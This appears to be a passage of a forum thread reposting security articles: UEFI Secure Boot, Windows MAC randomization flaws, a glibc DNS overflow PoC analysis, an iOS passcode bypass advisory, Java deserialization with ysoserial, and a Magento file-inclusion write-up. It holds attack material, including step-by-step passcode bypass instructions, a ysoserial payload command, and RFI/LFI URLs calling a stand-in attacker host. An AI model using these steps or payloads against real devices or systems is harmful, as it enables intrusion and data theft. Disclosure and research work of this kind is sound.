device running Windows 10 Enterprise Insider Preview Build 11082. The process begins by clicking Start/Settings from the desktop. Upon the first restart, click the following screens as indicated. And the second restart should bring up the boot setup screen shown earlier in this article. And again as mentioned, the process via UI can be short-cut by pressing the power and the volume up button at the same time for a few seconds, while a Surface Pro device is powered off. Closing Thoughts With on-going malware threats and a growing trend in adopting BYOD, IT must recognize the urgency to fundamentally secure corporate devices from power on to off. UEFI Secure Boot is an industry standard and a mechanism to ensure hardware integrity every time and all the time. There are specific hardware requirements and configurations must be first put in place for solutions relying on UEFI Secure Boot like Device Guard for Windows 10 Enterprise. Therefore, rolling out UEFI 2.3.1 or later and TPM 2.0 as well are important hardware components for IT to leverage hardware-based security features to fundamentally secure corporate devices. Sursa: https://yungchou.wordpress.com/2016/03/04/an-introduction-of-uefi-secure-boot-in-windows-10-enterprise/

How MAC Address Randomization Works on Windows 10 When Apple announced its devices would use random MAC addresses when searching for Wi-Fi networks, it received extensive media attention. And rightly so. It prevents companies from tracking your movements, and Apple was the first major player to start doing this. Windows and Android are quietly trying to catch up. As a result, some devices running Windows now support MAC address randomization, and we will discuss how it's implemented, and where it fails. This information is a small selection from the recent paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms. How it works Microsoft first added support for MAC address randomization in Windows 10. Unfortunately, it's only available if you have a WiFi card and driver that support it. For example, the Intel 7265 AC, when using the latest driver, supports randomization [1]. You can see if your hardware supports MAC address randomization by going through the following menus: If your hardware supports MAC address randomization, you will see the following option at the top of the window: As you can see, I have it enabled on my laptop. So far it's been working quite well. What's very interesting about Microsoft's approach is that it also uses random MAC addresses when connecting to a wireless networks. In contrast, Apple only uses random addresses when searching for nearby networks, and it falls back to its original address when connecting to a network. In this aspect Windows 10 offers better privacy than Apple. Using a random MAC address to connect to a network can cause problems if users are authenticated (i.e., recognized) based on their MAC address [2]. Interestingly, Windows avoids this issue by always using the same random address every time it connect to a specific network. For example, let's say you want to pay for Wi-Fi access, and they authenticate you based on your MAC address. Then this is not a problem. The first time you connect, Windows will generate a random MAC address. And if you reconnect to this network at a later point in time, Windows will reuse the previously generated address. Therefore the system can still recognize you, and you don't have to pay twice. There's one downside to this approach: since you always use the same address when connecting to a particular network, an adversary can learn when certain devices connect to specific networks. Nevertheless, compared to the old situation where you'd always use the original MAC address, it improves your privacy. Technically, the random MAC address that is used to connect to a network is calculated as [5]: address = SHA-256(SSID, real MAC address, connectionId, secret)[:6] Here SSID is the name of the network you are connecting to, real MAC address the original address of your network interface, and connectionId is a value that changes every time the user removes (and re-adds) the network (i.e., this value is updated if you "forget" the network under Windows 10). The secretparameter is a 256-bit cryptographic random number, generated during system initialization, and kept the same across reboots. Every interface has a different value of the secret parameter, to assure each interface gets different random MAC address. Finally, bits in the most significant byte of address are set so it becomes a locally administered, unicast address. While the presentation by Huitema partly described this process, our paper is the first to describe this formula in full detail. It's also possible to disable randomization for certain networks. In this case Windows will use the original address when connecting to a network. You can configure this through the following settings when you are currently connected to the network: Notice that the user has three options for each specific network: On: the same random MAC address is always used when connecting to this network. Off: the original MAC address is used. Change daily: every day a new random MAC address is used. Remark that if randomization is enabled, independent of the above options, Windows 10 will always use random MAC addresses when scanning for nearby networks. This "scanning" address changes every time you connect (and disconnect) from a network, and when you restart your device [3]. Hence it doesn't change that frequently, but it's still sufficient to prevent tracking over extended periods of time. In contrast, Apple changes the scanning address roughly every few minutes, which provides more privacy. Basic Security Analysis Randomization as implemented in Windows 10 significantly improves your privacy. So enable it!Unfortunately, it's not perfect, because there are still some ways to defeat or bypass it. The first weakness is that the sequence number contained in WiFi frames is not reset when changing the (random) MAC address. This sequence number, which is present in most Wi-Fi frames, is used to detected retransmissions, and is incremented by one after successfully transmitting a frame. As shown in the picture below, when the MAC address changes because the user connects to a network, the sequence counter is not reset: The last frame from ea:69:0a:* has the sequence number of 92, and the other address 7c:5c:f8:* has the sequence number 94. Based on this an adversary can reasonably conclude that both frames are sent by the same device. In other words, he learns that the same device was using both addresses, defeating the purpose of address randomization. The second problem is that Windows 10 reveals its real MAC address when interacting with Hotspot 2.0 networks. But what's Hotspot 2.0? Simply put, Hotspot 2.0 is a new standard to automatically and securely roam between WiFi networks. No manual interaction is needed. Your device automatically determines whether you have the appropriate credentials (passwords) to connect to a network. Think of this like the cellular network: when you get off the plane, you phone automatically finds and connects to a foreign cellular networks. Hotspot 2.0 provides a similar experience for WiFi. In order to accomplish automatic roaming, Hotspot 2.0 sends ANQP queries to the Access Point before connecting to it. These ANQP queries request detailed information about the wireless network. This information includes the credentials that are needed to connect with the hotspot, whether the hotspot provides internet access or only local network access, etc. Unfortunately, Windows 10 sends these ANQP queries using the real (original) MAC address: In the first probe request it uses the random MAC address 2a:b3:e6:*. These probe requests are used to detect the presence of networks. If there's a Hotspot 2.0 network nearby, Windows will send ANQP requests using the real MAC address, in this case 7c:5c:f8:*. Therefore an attacker can obtain your real MAC address by advertising a Hotspot 2.0 network. Thankfully, Windows 10 only sends ANQP queries if at least one Hotspot 2.0 is configured. Since this is standard is not yet widely deployed, few users will have such a network configured [4]. Detailed Security Analysis Want to know all flaws that are present in existing implementations of MAC address randomization? And this specifically for Android, Apple, Linux, and Windows? Then read my paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms [5]! It has everything explained in technical detail. References and Footnotes [1] If you have an Intel 7260 AC, you can also force Windows 10 to use the drivers of the Intel 7265 AC. Your device will still work, and will support MAC address randomization. [2] Even though authentication based on the MAC address is utterly insecure (an adversary can easily spoof a MAC address), it's still used by many systems. [3] C. Huitema. Personal communication, Nov. 2015. [4] One notable exception is the Passpoint configuration provided by Boingo. Essentially Passpoint is a synonym of Hotspot 2.0. If you have this configuration installed, you have a Hotspot 2.0 capable device, and the Boingo configuration will use Hotspot 2.0. This means Windows will send ANQP queries to nearby Hotspot 2.0 networks. [5] M. Vanhoef, C. Matte, M. Cunche, L. S. Cardoso, and F. Piessens. Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms (AsiaCCS 2016). Geplaatst door Mathy op 20:21 Sursa: http://www.mathyvanhoef.com/2016/03/how-mac-address-randomization-works-on.html

CVE 2015-7547 glibc getaddrinfo() DNS Vulnerability Posted by jstester007 on March 7th, 2016 Hello w0rld! JUMPSEC researchers have spent some time on the glibc DNS vulnerability indexed as CVE 2015-7547 (It hasn’t got a cool name like GHOST unfortunately…). It appears to be a highly critical vulnerability and covers a large number of systems. It allows remote code execution by a stack-based overflow in the client side DNS resolver. In this post we would like to present our analysis. Google POC overview Google POC Network Exploitation Timeline Google POC Exploit Code Analysis First response Code snippet Packet capture snippet The dw() function calls a “struct” module from python library. According to the documentation, it performs conversion between python values and C structs represented as python strings. In this case, it interprets python integer and pack it into little-endian short type binary data. This is a valid response sent by the “malicious” DNS server when it receives any initial queries. This response packet is constructed intentionally in large size (with 2500 bytes of null), it forces the client to retry over TCP and allocate additional memory buffer for the next response. This also triggers the dual DNS query from getaddrinfo() on the client side, which is a single request containing A and AAAA queries concatnated. Second Response Code snippet Packet capture snippet This is the second response sent by the malicious DNS server. It is a malformed packet sending large numbers of “fake records” (184 Answer RRs) back to the client. According to google, this forces __libc_res_nsend to retry the query. Third response Code snippet Packet capture snippet This is the third response sent by the “malicious” DNS server. It is another malformed packet which is carrying the payload. JUMPSEC researcher has modified the Google POC code to identify the the number of bytes to cause a segmentation fault (possibly overwriting the RET address) of the buffer. It is found that the RET address is being overwritten on the 2079thbyte. With the addition of return_to_libc technique, an attacker can bypass OS protection such as NX bit or ASLR and perform remote code execution. Google POC debugging and crash analysis JUMPSEC has run it through the trusty gdb. It crashes with a SEGMENTATION FAULT which verifies that the DNS response has smashed the stack of the vulnerable client application when running getaddrinfo(). The vulnerable buffer is operated in gaih_getanswer. The entry address has been overwritten with 0x4443424144434241 (ABCDABCD). The state of the register also showing the overflowed bytes. SEGFAULT from vulnerable client. RET address is overwritten with “ABCDABCD” Backtrack Registers JUMPSEC has also tested it on a few other applications. It was found that the getaddrinfo() function in glibc is commonly used… Iceweasel crashing Conclusion The best way to mitigate this issue is to enforce proper patching management. Make sure to update all your systems with the latest version of glibc . If you have any systems exposed on the internet and you want to make sure that this vulnerability is not triggered then the following Wireshark filter could be useful: (DNS.length>2048 to see malformed packets). A DNS response has a maximum of 512 bytes (typically), note that the DNS reply is truncated. Even if the client does not accept large response, smaller responses can be combine into a large one which can also trigger the vulnerability. A possible filter is to monitor the size of the entire conversation as a distinct amount of bytes in total is require to trigger specific responses from vulnerable client and all of them requires more than 2048 bytes. The above vulnerability can be fixed by patching. If you are running RedHat or CentOS a simple yum -y update glibc will update the libc and resolve the issue. Reference links https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547 http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html https://googleonlinesecurity.blogspot.co.uk/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html Sursa: https://labs.jumpsec.com/2016/03/07/cve-2015-7547-glibc-getaddrinfo-dns-vulnerability/

Climber Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation. Dependencies python >= 2.7 python-crypto python-mako python-paramiko Note Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH. https://github.com/knipknap/exscript This module is already included in Climber sources. License This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Sursa: https://github.com/raffaele-forte/climber

Romanian ATM hacker exploits vulnerability in FENCE, escapes jail Robber clobbered but catching carder is harder 8 Mar 2016 at 05:56, Darren Pauli A Romanian carder arrested for using malware to plunder US$217,000 (£152,164, A$290,888) from ATMs has cut their way out of a Bucharest prison and escaped custody. Renato Marius Tulli, 34, escaped Police Precinct 19 with Grosy Gostel, 38, held for robbery charges, sparking a city-wide hunt, local media report. Gostel has been caught while malware man Tulli remains on the run. The carder and the robber cut a hole in the mesh fence and jumped an outer fence at the police station. Tulli and his gang raided ATMs maintained by NCR across Romania, Hungary, Spain, Russia, and the Czech Republic. They used the Tyupkin malware loading it onto ATMs using a CD slotted into the back of the machines. That malware has been upgraded in recent months and is now known as GreenDispenser and is being used to target ATMs across Mexico. There is little preventing the self-deleting malware from being used in other countries, experts say. ® Sursa: http://www.theregister.co.uk/2016/03/08/romanian_atm_hacker_exploits_vulnerability_in_fence_escapes_jail/

Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities From: Vulnerability Lab <research () vulnerability-lab com> Date: Mon, 7 Mar 2016 09:52:02 +0100 Document Title: =============== Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities (App Store Link, Buy Tones Link & Weather Channel Link) References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1778 Video: http://www.vulnerability-lab.com/get_content.php?id=1779 Release Date: ============= 2016-03-07 Vulnerability Laboratory ID (VL-ID): ==================================== 1778 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by Apple on September 12, 2012, 400 million devices have beensold through June 2012. ( Copy of the Homepage: http://en.wikipedia.org/wiki/IOS ) Apple Inc. is an American multinational technology company headquartered in Cupertino, California, that designs, develops, and sells consumer electronics, computer software, and online services. Its hardware products include the iPhone smartphone, the iPad tablet computer, the Mac personal computer, the iPod portable media player, and the Apple Watch smartwatch. Apple's consumer software includes the OS X and iOS operating systems, the iTunes media player, the Safari web browser, and the iLife and iWork creativity and productivity suites. Its online services include the iTunes Store, the iOS App Store and Mac App Store, and iCloud. (Copy of the Homepage: https://en.wikipedia.org/wiki/Apple_Inc. ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple connected passcode protection bypass vulnerabilities in the iOS v9.0, v9.1, v9.2.1 for Apple iPhone (5,5s,6 & 6s) and the iPad (mini,1 & 2). Vulnerability Disclosure Timeline: ================================== 2016-01-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-01-04: Vendor Notification (Apple Product Security Team) 2016-**-**: Vendor Response/Feedback (Apple Product Security Team) 2016-**-**: Vendor Fix/Patch (Apple Developer Team) 2016-**-**: Security Acknowledgements (Apple Product Security Team) 2016-03-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Apple Product: iOS - (Mobile Operating System) 9.1, 9.2 & 9.2.1 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ An auth passcode bypass vulnerability has been discovered in the iOS v9.0, v9.1, v9.2.1 for Apple iPhone (5,5s,6 & 6s) and the iPad (mini,1 & 2). The vulnerability typ allows an local attacker with physical device access to bypass the passcode protection mechanism of the Apple mobile iOS devices. The vulnerabilities are located in the 'Appstore', 'Buy more Tones' or 'Weather Channel' links of the Clock, Event Calender & Siri User Interface. Local attackers can use siri, the event calender or the available clock module for an internal browser link request to the appstore that is able to bypass the customers passcode or fingerprint protection mechanism. The attacker can exploit the issue on several ways with siri, the events calender or the clock app of the control panel on default settings to gain unauthorized access to the affected Apple mobile iOS devices. 1.1 In the first scenario the attacker requests for example via siri an non existing app, after that siri answers with an appstore link to search for it. Then the attacker opens the link and a restricted browser window is opened and listing some apps. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls is visible in the siri interface only and is called "open App Store". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1 1.2 In the second scenario the attacker is using the control panel to gain access to the non restricted clock app. The local attacker opens the app via siri or via panel and opens then the timer to the end timer or Radar module. The developers of the app grant apple customers to buy more sounds for alerts and implemented a link. By pushing the link a restricted appstore browser window opens. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the Alert - Tone (Wecker - Ton) & Timer (End/Radar) and is called "Buy more Tones". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1. 1.3 In the third scenario the attacker opens via panel or by a siri request the clock app. After that he opens the internal world clock module. In the buttom right is a link to the weather channel that redirects to the store as far as its deactivated. By pushing the link a restricted appstore browser window opens. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the World Clock (Weather Channel) and is an image as link. Thus special case is limited to the iPad because only in that models use to display the web world map. In the iPhone version the bug does not exist because the map is not displayed because of using a limited template. The vulnerability is exploitable in the Apple iPad2 with iOS v9.0, v9.1 & v9.2.1. 1.4 In the fourth scenario the attacker opens via siri the 'App & Event Calender' panel. After that the attacker opens under the Tomorrow task the 'Information of Weather' (Informationen zum Wetter - Weather Channel LLC) link on the left bottom. As far as the weather app is deactivated on the Apple iOS device, a new browser window opens to the appstore. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the App & Events Calender panel. The vulnerability is exploitable in the Apple Pad2 with iOS v9.0, v9.1 & v9.2.1. The security risk of the passcode bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the passcode protection mechanism bypass vulnerability requires no privileged ios device user account or low user interaction. Physical apple device access is required for successful exploitation. Successful exploitation of the vulnerability results in unauthorized device access, mobile apple device compromise and leak of sensitive device data like the address-book, photos, sms, mms, emails, phone app, mailbox, phone settings or access to other default/installed mobile apps. Vulnerable Module(s): [+] PassCode (Protection Mechanism) Affected Device(s): [+] iPhone (Models: 5, 5s, 6 & 6s) [+] iPad (Models: mini, 1 & 2) Affected OS Version(s): [+] iOS v9.0, v9.1 & v9.2.1 Proof of Concept (PoC): ======================= The passcode protection mechanism bypass vulnerabilities can be exploited by local attackers with physical device access and without privileged or restricted device user account. For Security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1.1 Manual steps to reproduce the vulnerability ... (Siri Interface - App Store Link) iPhone (Models: 5, 5s, 6 & 6s) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) 3. Ask Siri to open a non existing App Note: "Open App Digital (Öffne App Digital) 4. Siri responds to the non existing app and asks to search in the appstore 5. Now, and "open App store" button becomes visible to push (do it!) 6. A new restricted browser window opens with the appstore buttom menu links 7. Click to updates and open the last app or push twice the home button to let the task slide preview appear 8. Now choose the active front screen task 9. Successful reproduce of the passcode protection bypass vulnerability! 1.2 Manual steps to reproduce the vulnerability ... (Clock & Timer - Buy more Tones Link) iPhone (Models: 5, 5s, 6 & 6s) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) Note: "Open World Clock" (Öffne App Weltuhr) 3. Push the 'Timer' module button on the buttom 4. Now, push the Radius or End Timer Button in the middle of the screen Note: A listing opens with the sounds collection and on top is a web link commercial 5. Push the button and a new restricted browser window opens with the appstore buttom menu links 6. Click to updates and open the last app or push twice the home button to let the task slide preview appear 7. Now choose the active front screen task 8. Successful reproduce of the passcode protection bypass vulnerability! Note: The vulnerability can also be exploited by pushing the same link in the Alerts Timer (Wecker) next to adding a new one. 1.3 Manual steps to reproduce the vulnerability ... (Clock World - Weather Channel Image Link) iPad (Models: 1 & 2) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) Note: "Open App Clock" (Öffne App Uhr) 3. Switch in the buttom module menu to world clock Note: on the buttom right is an image of the weather channel llc network 4. Push the image of the weather channel llc company in the world map picture Note: Weather app needs to be deactivated by default 5. After pushing the button and a new restricted browser window opens with the appstore buttom menu links 6. Click to updates and open the last app or push twice the home button to let the task slide preview appear 7. Now choose the active front screen task 8. Successful reproduce of the passcode protection bypass vulnerability! Note: The issue is limited to the iPad 1 & 2 because of the extended map template! 1.4 Manual steps to reproduce the vulnerability ... (Events Calender App - Weather Channel LLC Link) iPad (Models: 1 & 2) & iPhone (Models: 5, 5s, 6 & 6s) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) Note: "Open Events/Calender App" (Öffne Events/Kalender App) 3.Now push on the buttom of the screen next to the Tomorrow(Morgen) module the 'Information of Weather Channel' link Note: Weather app needs to be deactivated by default 4.After pushing the button and a new restricted browser window opens with the appstore buttom menu links 5. Click to updates and open the last app or push twice the home button to let the task slide preview appear 6. Now choose the active front screen task 7. Successful reproduce of the passcode protection bypass vulnerability! Video Demonstration: In the attached video demonstration we show how to bypass the passcode of the iphone 6s via the siri App Store- & timer Buy more Tones link. In the video we activated the passcode and setup to activate the control center by default to the locked mobile front screen. Siri was activated as well by default. Solution - Fix & Patch: ======================= The vulnerabilities can be temporarily patched by the end user by hardening of the device settings. Deactivate in the Settings menu the Siri module permanently. Deactivate also the Events Calender without passcode to disable the push function of the Weather Channel LLC link. Deactivate in the next step the public control panel with the timer and world clock to disarm exploitation. Aktivate the weather app settings to prevent the redirect when the module is disabled by default in the events calender. Finally apple needs to issue a patch as workaround for the issue but since this happens a temp solution has bin published as well. Security Risk: ============== The security risk of the passcode protection mechanism bypass vulnerabilities in the apple ipad and iphone mobile devices are estimated as high. (CVSS 6.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research () vulnerability-lab com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research () vulnerability-lab com) to get a ask permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research () vulnerability-lab com Sursa: http://seclists.org/fulldisclosure/2016/Mar/15

Java Deserialization Attacks with Burp Eric Gruber | March 2, 2016 Introduction This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page here. The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with. For the majority of the applications we see, we can simply proxy the connection between the application and the server to view the serialized body of the HTTP request and HTTP response, assuming that HTTP is the protocol that is being used for communication. For this blog, HTTP is going to be assumed and to perform any type of proxying for HTTP, we will use Burp. Burp Proxy Here’s a simple example what a Burp proxied HTTP request with a serialized Java object in its body looks like: In this example we have a serialized object called State that is comprised of two Strings, capitol (spelled wrong in the example) and nicknames. From here, we can manipulate the request by sending it to the Repeater tab. Generating Serialized Exploits There are a few tools out there that will generate serialized Java objects that are able to exploit vulnerable software. I’m a big fan of Chris Frohoff’s ysoserial (https://github.com/frohoff/ysoserial.git). He has payload generators for nine exploitable software stacks at the time of me writing this. Simply running the jar file with the payload type and command to execute will generate the serialized object for you. Just make sure you output it to a file: java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 'ping netspi.com' > payload We can then copy the serialized output into Burp using the paste from file context menu item: Which will result in the following: Generating Serialized Exploits in Burp Ysoserial works well enough, but I like to optimize my exploitation steps whenever possible. This includes removing the need to go back and forth between the command line and Burp. So I created the Burp extension Java Serial Killer to perform the serialization for me. It essentially is a modified Repeater tab that uses the payload generation from ysoserial. To use Java Serial Killer, right click on a POST request with a serialized Java object in the body and select theSend to Java Serial Killer item. A new tab will appear in Burp with the request copied over into a new message editor window. In the Java Serial Killer tab there are buttons for sending requests, serializing the body, selecting a payload type, and setting the command to run. For an example, say we want to ping netspi.com using the CommonsCollections1 payload type, because we know it is running Commons-Collections 3.1. We just set the payload in the drop down menu and then type the command we want and press the serialize button. Pressing the little question mark button will also display the payload types and the software versions they are targeting if you need more information. We now have our command in a serialized object in the request. Pressing the Go button will send the request off and show the response on the right hand side. If you prefer to use Repeater, you can send it to that too. If you want to try another payload, simply select the new payload and hit serialize again. As Chris Frohoff adds more payloads, I plan to update Java Serial Killer accordingly. Conclusion I submitted the plugin to the Burp app store and I don't expect it to take too long to get approved, but if you want to try it out now, you can get it from our Github page (https://github.com/NetSPI/Burp-Extensions/releases). You will need to be running Java 8 for it to work. Sursa: https://blog.netspi.com/java-deserialization-attacks-burp/

Heartbleed e singurul atact si simplu si "reliable" si util. Ceva detalii aici despre DROWN: http://blog.cryptographyengineering.com/2016/03/attack-of-week-drown.html

AuthMatrix for Burp Suite – Web Authorisation Testing Tool AuthMatrix a web authorisation testing tool built as an extension to Burp Suite that provides a simple way to test authorisation in web applications and web services. With AuthMatrix, testers focus on thoroughly defining tables of users, roles, and requests for their specific target application upfront. These tables are displayed through the UI in a similar format to that of an access control matrix commonly built in various threat modelling methodologies. Once the tables have been assembled, testers can use the simple click-to-run interface to efficiently run all combinations of roles and requests. Testers can then confirm their results with an easy to read, color-coded interface indicating any authorisation vulnerabilities detected in the system. Additionally, the extension provides the ability to save and load target configurations for simple regression testing. Usage Create users that fit these various roles and check all roles that the user belongs to. If a user is part of multiple roles, check each role individually. From another area of Burp Suite (i.e. Target tab, Repeater Tab, etc) right click a request and select “Send to AuthMatrix.” This will create a new item in the second table of the interface. Multiple requests can be added all at once by selecting several requests from within the Target tab. In the second table of AuthMatrix, check all roles that are authorised to make each request. Create a regex based on the expected response behavior of the request to determine if the action has succeeded. Common regexes include HTTP Response headers, success messages within the body, or other variations within the body of the page. Generate session tokens for each user via a web browser or the repeater tab and enter them into the correct field within the first table. Click Run to run all requests or right click several messages and select run. Observe that the adjacent table will show color-coded results, red indicating the request did not return expected results and may indicate a vulnerability. You can download AuthMatrix here: AuhtMatrix.py Or read more here. Sursa: http://www.darknet.org.uk/2016/03/authmatrix-for-burp-suite-web-authorisation-testing-tool/

Attacking The XNU Kernel In El Capitain

Hacking Magento eCommerce For Fun And 17.000 USD Magento, which was acquired by Ebay Inc back in 2011, is one of the most popular e-commerce platforms written in PHP. There is an interesting bug bounty program in place that offers bounties of up to 10,000$ for Information Disclosure and Remote Code Execution vulnerabilities. In November 2014, I decided to give it a try, so I started looking for security bugs in Magento CE, and almost immediately I discovered a PHP Object Injection vulnerability which (un)fortunately requires administrator privileges in order to be exploited. I thought this reason was good enough to choose not to report my finding under their bug bounty program, since Magento administrators should already be able to upload and execute arbitrary code through the administration panel. However, after a couple of weeks a friend of mine encouraged me to submit the finding, because you never know. So I did it, and when I finished writing my report including a PoC, and I was about to send it, I noticed that the bug had already been (silently!) patched only a few days earlier! The researcher who reported the vulnerability has been awarded with 2,500$ for the very same finding… A couple of months later, in February 2015, there was a lot of rumors about what I consider a very nice piece of research which chains several vulnerabilities in Magento that ultimately allow an unauthenticated attacker to execute arbitrary PHP code on the web server. Getting inspired by these vulnerabilities, I decided to come back to Magento source code looking for new security bugs, and I discovered and reported two vulnerabilities which made me win two bounties I’d never thought I’d receive: 8,000$ and9,000$. Both of the vulnerabilities were discovered in February 2015, however I decided to report only a “potential Remote Code Execution” at a first stage, because I thought the other one – a trivial information leakage bug – had a security impact too low in order to be eligible for the bug bounty program, in other words I thought it wasn’t a “real” security issue. I was wrong (again!)… • Autoloaded File Inclusion in SOAP API (CVE-2015-6497) There is a class of vulnerabilities that might affect certain PHP applications which uses an “exploitable” autoloading mechanism. The “Autoloading Classes” feature has been introduced in PHP 5.0 with the magic function __autoload() which is automatically called when your code references a class or interface that hasn’t been loaded yet. So, instead of including every needed class by hand, it is possible to register a function that gets called as soon as the code tries to instantiate an unknown class. This function gets passed the unknown class name and is responsible for including the right file that contains the class definition. While this feature is extremely useful and powerful, it might introduce potential Local/Remote File Inclusion vulnerabilities when user-controlled input is used as a class name. Indeed, if an attacker can control the class name variable passed to an autoloading function, she could try to play around with it in order to include an arbitrary file and execute PHP code remotely. There are multiple ways to trigger the autoloader, the most obvious is class instantiation using the new operator. In addition to that, there are some PHP functions which can be considered a sensitive sink for this class of vulnerabilities. Here is an incomplete list: class_exists() interface_exists() method_exists() property_exists() is_subclass_of() … So, when user-controlled input (tainted data) enters one of these sensitive sinks there’s a chance for the application to be vulnerable to an “Autoloaded File Inclusion” attack. Let’s see a simple example of vulnerable code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 /* Some code... */ function __autoload($class_name) { include $class_name . '.php'; } if(isset($_GET['class']) && class_exists($_GET['class'])) { $myObject = new $_GET['class']; } else { die('No class found'); } /* Some code... */ In this example an attacker controls a class name via the GET parameter “class”, which is first used with the class_exists()function (triggering the autoloader in case it is an unknown class) and then to instantiate a new object. This means that the attacker can control the $class_name variable passed to the autoloader, therefore it could be possible to include arbitrary files from both local or remote resources by invoking URLs like these: http://example.com/vuln.php?class=http://attacker.com/shell http://example.com/vuln.php?class=../../../tmp/cache/attacker_controlled/file In the first case the autoloader will try to include and execute the PHP code located at http://attacker.com/shell.php, resulting in a Remote File Inclusion (RFI); while in the second case the autoloader will try to include and execute the PHP code located into the file /tmp/cache/attacker_controlled/file.php, resulting in a Local File Inclusion (LFI). Furthermore, in cases like this where the attacker controls the classname’s prefix, in addition to http:// other PHP wrappers might be abused in order to execute arbitrary PHP code. According to the official PHP documentation “a valid class name starts with a letter or underscore, followed by any number of letters, numbers, or underscores”. That means an attacker cannot include arbitrary files via class names because it should not be possible to e.g. use path traversal sequences (../../) through them. But here comes the problem: there was a bug in the PHP core which allowed to invoke class autoloaders with invalid class names. This bug was solved in January 2014 with the release of PHP versions 5.4.24 and 5.5.8, and that’s probably one of the reasons why Magento’s security engineers have undervalued this issue. Magento Vulnerability The vulnerability in Magento is caused by the code that handles the “catalogProductCreate” SOAP API call. The vulnerable code is located into the /app/code/core/Mage/Catalog/Model/Product/Api/V2.php script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 public function create($type, $set, $sku, $productData, $store = null) { if (!$type || !$set || !$sku) { $this->_fault('data_invalid'); } $this->_checkProductTypeExists($type); $this->_checkProductAttributeSet($set); /** @var $product Mage_Catalog_Model_Product */ $product = Mage::getModel('catalog/product'); $product->setStoreId($this->_getStoreId($store)) ->setAttributeSetId($set) ->setTypeId($type) ->setSku($sku); if 